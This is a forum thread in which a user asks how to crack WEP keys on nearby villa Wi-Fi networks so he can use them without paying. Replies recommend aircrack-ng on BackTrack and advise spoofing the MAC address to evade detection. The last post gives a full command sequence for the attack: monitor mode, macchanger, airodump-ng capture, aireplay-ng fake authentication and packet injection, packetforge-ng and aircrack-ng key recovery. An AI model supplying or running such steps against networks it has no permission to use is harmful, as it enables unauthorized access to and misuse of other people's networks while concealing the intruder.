WEP Decoder

micky007

Newbie
Joined
May 2, 2011
Messages
24
Reaction score
2
Hi Guys,

I'm going to be going on holiday for nearly a month in Spain where internet is expensive. At our villa there is a number of WEP Wireless Connections and I'm looking for someone to tell me what the best Windows based WEP Decoder/Cracker is so it can search for wireless connections and crack them and supply me with the WEP Key so i can connect to the network.

Also do i need to purchase a specific wireless adapter?

Any help/advice would be great.

Thanks
 
Its been a while since I did this but do a Google search for it and you will find some forums (that's how I did it). Last time I did it there were two programs you ran together and it would get you access in like 4-5 hours of running, that was years ago though.
 
aircrack via backtrack

beware, its not for the novice. better make sure you spoof your mac too. You do understand the legal issues that may arise from the use of these softwares right? good.
 
aircrack via backtrack

beware, its not for the novice. better make sure you spoof your mac too. You do understand the legal issues that may arise from the use of these softwares right? good.

But isnt that Linux? Is there not a Windows program that can do this?

Thanks
 
Basically, you'll be able to find many softwares to decode WEP, BUT your wifi device should be able to enter scanning-mode, its a specific process and not all hardwares are capable of that.

You'll find a list of wifi devices on aircrack site that are compatible.

Regards
 
Forget Windows. Not many fans create custom drivers for it because its user-friendliness makes it a complicated task.

No reason to chase the 100x harder way as you don't have to install linux, find a live version of it (like BackTrack), put it on a DVD or an usb drive and load it from there. Find the key as described on the internet using your notebook's wireless adapter, remove the DVD and boot back to your windows.
 
make sure you take another spare wireless pcmci modem with you who can receive the packets and is compatible with aircrack
 
heres the commands
rausb0 is my wireless card yours could be different
-n is the encryption try different ones 64 128 256
-c is the channel the ac is running on
-a is there mac
-h is your mac
-BlahblahT-01.cap is the file that airodump creates (leave the second airodump running during this whole time)

(note this attack should work even if there is no traffic)
-------------------------------------------------------
$airmon-ng stop rausb0

$ifconfig rausb0 down

$macchanger --mac 00:11:22:33:44:55 rausb0

$airmon-ng start rausb0

$airodump-ng rausb0 then CTRL C (check the details)

$airodump-ng -c 1 -w "Blahblah" --bssid 00:78:33:O3:53:P1 rausb0

$aireplay-ng -1 0 -e "Blahblah" -a 00:78:33:O3:53:P1 -h 00:11:22:33:44:55 rausb0

$aireplay-ng -4 -h 00:11:22:33:44:55 -b 00:78:33:O3:53:P1 rausb0

$packetforge-ng -0 -a 00:78:33:O3:53:P1 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0716-178955.xor -w arp-request

$aireplay-ng -2 -r arp-request rausb0

$aircrack-ng -n 128 -z -f 1 -e "Blahblah" -b 00:78:33:O3:53:P1 BlahblahT-01.cap


you might have to play with the attack modes and the fudge factor
should take a novice person a couple hours to get it going after that itl take you 2-3mins
this is the commands i used a couple years back i'm sure there is something more simple now....Cain & Abel??....
 
Last edited:
Back
Top